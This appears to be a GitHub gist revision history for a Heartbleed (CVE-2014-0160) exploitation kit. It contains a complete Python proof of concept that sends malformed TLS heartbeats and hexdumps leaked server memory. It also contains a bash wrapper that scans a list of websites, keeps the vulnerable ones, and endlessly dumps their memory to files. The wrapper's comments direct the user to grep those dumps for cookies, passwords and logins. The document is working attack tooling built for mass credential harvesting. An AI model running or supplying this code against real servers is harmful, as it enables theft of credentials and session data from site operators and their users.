Julien Deudon revised this gist
Apr 9, 2014 . 1 changed file with 1 addition and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,5 @@ #!/bin/bash # Automatic exploitation script - Heartbleed OpenSSL bug CVE-2014-0160 # Using Python PoC from Jared Stafford ([email protected]): http://s3.jspenguin.org/ssltest.py # Check pattern with (for example): tail -f *.txt | egrep -C 5 -i 'cookie|pass|pwd|login' -
Julien Deudon revised this gist
Apr 9, 2014 . 1 changed file with 136 additions and 0 deletions.There are no files selected for viewing
@@ -0,0 +1,136 @@ #!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') hb = h2bin(''' 18 03 02 00 03 01 40 00 ''') def hexdump(s): for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) print ' %04x: %-48s %s' % (b, hxdat, pdat) print def recvall(s, length, timeout=5): endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? 
if not data: return None rdata += data remain -= len(data) return rdata def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return False if typ == 24: print 'Received heartbeat response:' hexdump(pay) if len(pay) > 3: print 'WARNING: server returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return True if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return False def main(): opts, args = options.parse_args() if len(args) < 1: options.print_help() return s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Connecting...' sys.stdout.flush() s.connect((args[0], opts.port)) print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) hit_hb(s) if __name__ == '__main__': main() -
Julien Deudon revised this gist
Apr 8, 2014 . 1 changed file with 52 additions and 11 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,5 +1,5 @@ #!/bin/bash # Automatic exploitation script - Heartbleed OpenSSL bug CVE-2014-0160 # Using Python PoC from Jared Stafford ([email protected]): http://s3.jspenguin.org/ssltest.py # Check pattern with (for example): tail -f *.txt | egrep -C 5 -i 'cookie|pass|pwd|login' # Stop the script with (yes I know...): ps aux | grep 'ssltest\.sh' | awk '{print $2}' | xargs -x kill -9 @@ -28,13 +28,33 @@ do until [ $status -eq 1 ] || [ $attempt -eq $max_attempt ] do let "attempt=$attempt+1" if echo "$line" | egrep -q ":" ; then arr=$(echo $line | tr ":" "\n") array=() for x in $arr do array=( ${array[*]} $x ) done #echo ${array[0]} ${array[1]} echo "ATTEMPT $attempt/$max_attempt: python ssltest.py ${array[0]} -p ${array[1]}" sslcheck=$(python ssltest.py ${array[0]} -p ${array[1]} 2>&1) wcl=$(echo "$sslcheck" | wc -l) if [ $wcl -gt 100 ] then status=1 echo "IS VULN !!!" fi else echo "ATTEMPT $attempt/$max_attempt: python ssltest.py $line" sslcheck=$(python ssltest.py $line 2>&1) wcl=$(echo "$sslcheck" | wc -l) if [ $wcl -gt 100 ] then status=1 echo "IS VULN !!!" fi fi done if [ $status -eq 0 ] 
@@ -45,12 +65,33 @@ do fi done # Let's make a dump file for eatch vulnerable website filelines=$(cat $filename) i=0 # Read eatch line of the website list while true do for line in $filelines do # If line not start with "#" if ! echo "$line" | grep -lq "^#" then if echo "$line" | egrep -q ":" ; then arr=$(echo $line | tr ":" "\n") array=() for x in $arr do array=( ${array[*]} $x ) done echo ${array[0]} ${array[1]} echo "~> python ssltest.py ${array[0]} -p ${array[1]}" python ssltest.py "${array[0]}" -p "${array[1]}" | tee -a "${array[0]}.txt" else echo "~> python ssltest.py $line" python ssltest.py "$line" | tee -a "$line.txt" fi fi done done -
Julien Deudon created this gist
Apr 8, 2014 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,56 @@ #!/bin/bash # Exploitation script - Heartbleed OpenSSL bug CVE-2014-0160 # Using Python PoC from Jared Stafford ([email protected]): http://s3.jspenguin.org/ssltest.py # Check pattern with (for example): tail -f *.txt | egrep -C 5 -i 'cookie|pass|pwd|login' # Stop the script with (yes I know...): ps aux | grep 'ssltest\.sh' | awk '{print $2}' | xargs -x kill -9 filename='ssltest_website_list.txt' # Website list (one per line) max_attempt=3 # Maximum number of attempt # Sort and remove duplicate lines echo -n "$(sort $filename | uniq -u | grep -v '^$')" > $filename filelines=$(cat $filename) i=0 # Read eatch line of the website list for line in $filelines do # Calculate line number let "i=$i+1" # If line not start with "#" if ! echo "$line" | grep -lq "^#" then # Check website echo "[+] Check $line (line $i)" status=0 attempt=0 # Check until max attempt reatched or vuln found until [ $status -eq 1 ] || [ $attempt -eq $max_attempt ] do let "attempt=$attempt+1" echo "ATTEMPT $attempt/$max_attempt" sslcheck=$(python ssltest.py $line 2>&1) wcl=$(echo "$sslcheck" | wc -l) if [ $wcl -gt 100 ] then status=1 echo "IS VULN !!!" fi done if [ $status -eq 0 ] then echo "NOT VULN..." sed -i "s/^$line/#$line/" $filename fi fi done # Let's make a dump file for eatch vulnerable website vuln_website="$(sort $filename | uniq -u | grep -v '^#')" while true do for site in $vuln_website do python ssltest.py "$site" | tee -a "$site.txt" done done